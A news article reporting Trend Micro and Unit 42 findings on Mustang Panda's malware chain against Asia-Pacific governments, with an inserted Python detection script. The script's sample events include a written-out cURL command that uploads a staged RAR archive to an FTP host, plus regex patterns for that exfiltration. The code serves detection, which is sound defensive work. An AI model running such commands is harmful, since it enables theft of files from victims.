Mustang Panda Deploys Advanced Malware to Spy on Asia-Pacific Governments

By Admin, September 10, 2024

September 10, 2024, Ravi Lakshmanan, Cyber attack / malware

The threat actor tracked as Mustang Panda has refined its malware arsenal with new tools that facilitate data theft and the deployment of next-stage payloads, according to new findings from Trend Micro.

The cybersecurity firm, which tracks the activity cluster as Earth Preta, said it observed “the distribution of PUBLOAD via a variant of the HIUPAN worm.”

PUBLOAD is a known downloader malware associated with Mustang Panda since early 2022, deployed in cyberattacks targeting government organizations in the Asia-Pacific (APAC) region to deliver the PlugX malware.

“PUBLOAD was also used to inject additional tools into the target environment, such as FDMTP, which served as a secondary management tool that was observed to perform tasks similar to PUBLOAD; and PTSOCKET, a tool used as an alternative to exfiltration,” said security researchers Lennart Bermejo, Sunny Lu and Ted Lee.

Mustang Panda's use of removable drives as a distribution vector for HIUPAN was previously documented by Trend Micro in March 2023. Google-owned Mandiant tracks the same malware as FOG CLOAK, which it observed in connection with a cyberespionage campaign targeting the Philippines that may have begun as early as September 2021.

PUBLOAD is equipped with functions to perform reconnaissance of the infected network and collect files of interest (.doc, .docx, .xls, .xlsx, .pdf, .ppt and .pptx), while also serving as a conduit for a new hacking tool called FDMTP, described as “a simple malware downloader” implemented with the TouchSocket library over its Duplex Message Transfer Protocol (DMTP).

The collected data is compressed into a RAR archive and transmitted to an attacker-controlled FTP site via cURL. Alternatively, Mustang Panda has also been seen deploying a custom tool called PTSOCKET that can transfer files in multi-threaded mode.
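As an added illustration (not code from Trend Micro or from the article), the following is defender-side detection logic for the collection-and-exfiltration pattern just described: document types staged into a RAR archive on a host, followed by cURL pushing that archive to an FTP site. The process events, host names, paths and IP address are constructed placeholders.

```python
import ntpath
import re
from collections import defaultdict
from dataclasses import dataclass

# Document types PUBLOAD is reported to collect (listed in the write-up above).
DOC_RE = re.compile(r"\.(?:docx?|xlsx?|pdf|pptx?)\b", re.I)
# cURL upload of a .rar file (-T / --upload-file) combined with an ftp:// target.
RAR_UPLOAD_RE = re.compile(r"(?:-T|--upload-file)\s+\S+\.rar\b", re.I)
FTP_URL_RE = re.compile(r"\bftps?://", re.I)

@dataclass
class ProcEvent:
    host: str      # endpoint the process started on
    image: str     # full path of the process image
    cmdline: str   # command line as logged

def archives_documents(ev: ProcEvent) -> bool:
    """RAR archiver run against the document extensions PUBLOAD harvests."""
    exe = ntpath.basename(ev.image).lower()
    return exe in ("rar.exe", "winrar.exe") and DOC_RE.search(ev.cmdline) is not None

def uploads_rar_over_ftp(ev: ProcEvent) -> bool:
    """cURL pushing a .rar archive to an FTP server, the exfiltration step above."""
    return (ntpath.basename(ev.image).lower() == "curl.exe"
            and RAR_UPLOAD_RE.search(ev.cmdline) is not None
            and FTP_URL_RE.search(ev.cmdline) is not None)

def find_exfil_chains(events):
    """Hosts where both steps were seen; the value lists the evidence command lines."""
    staged, uploaded = defaultdict(list), defaultdict(list)
    for ev in events:
        if archives_documents(ev):
            staged[ev.host].append(ev.cmdline)
        if uploads_rar_over_ftp(ev):
            uploaded[ev.host].append(ev.cmdline)
    return {h: staged[h] + uploaded[h] for h in staged if h in uploaded}

# Constructed sample events (hypothetical hosts, paths and IP), not real telemetry.
SAMPLE_EVENTS = [
    ProcEvent("ws-02", r"C:\Program Files\WinRAR\Rar.exe",
              r"Rar.exe a -r C:\Users\Public\stage.rar *.docx *.xlsx *.pdf"),
    ProcEvent("ws-02", r"C:\Windows\System32\curl.exe",
              r"curl -T C:\Users\Public\stage.rar ftp://203.0.113.5/in/ --user u:p"),
    ProcEvent("ws-03", r"C:\Program Files\WinRAR\WinRAR.exe",
              r"WinRAR.exe a photos.rar *.jpg"),  # benign: no document types archived
]

if __name__ == "__main__":
    print(find_exfil_chains(SAMPLE_EVENTS))
```

Only ws-02 is reported, because the staging and the FTP upload must both occur on the same host; the benign WinRAR run on ws-03 matches neither condition.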

Additionally, Trend Micro attributes to the adversary a “fast-evolving” phishing campaign it discovered in June 2024, which distributes emails carrying a .url attachment that, when opened, delivers a signed downloader called DOWNBAIT.

The campaign is believed to have targeted Myanmar, the Philippines, Vietnam, Singapore, Cambodia and Taiwan, based on the file names and contents of the decoy documents.

DOWNBAIT is a first-stage downloader used to retrieve and execute the PULLBAIT shellcode in memory, which in turn downloads and runs a first-stage backdoor called CBROVER.

The implant, for its part, supports file upload and remote shell execution, and acts as a delivery vehicle for the PlugX remote access trojan (RAT). PlugX then deploys another file collector, called FILESAC, which harvests the victim’s files.

The disclosure comes as Palo Alto Networks Unit 42 detailed Mustang Panda’s abuse of the reverse shell functionality built into Visual Studio Code to gain a foothold in targeted networks, indicating that the threat actor is actively changing its modus operandi.

“Earth Preta has demonstrated significant progress in its malware deployment and strategies, particularly in its campaigns targeting government organizations,” the researchers said. “The group developed their tactics by (…) using multi-stage bootloaders (from DOWNBAIT to PlugX) and possibly using Microsoft cloud services to steal data.”
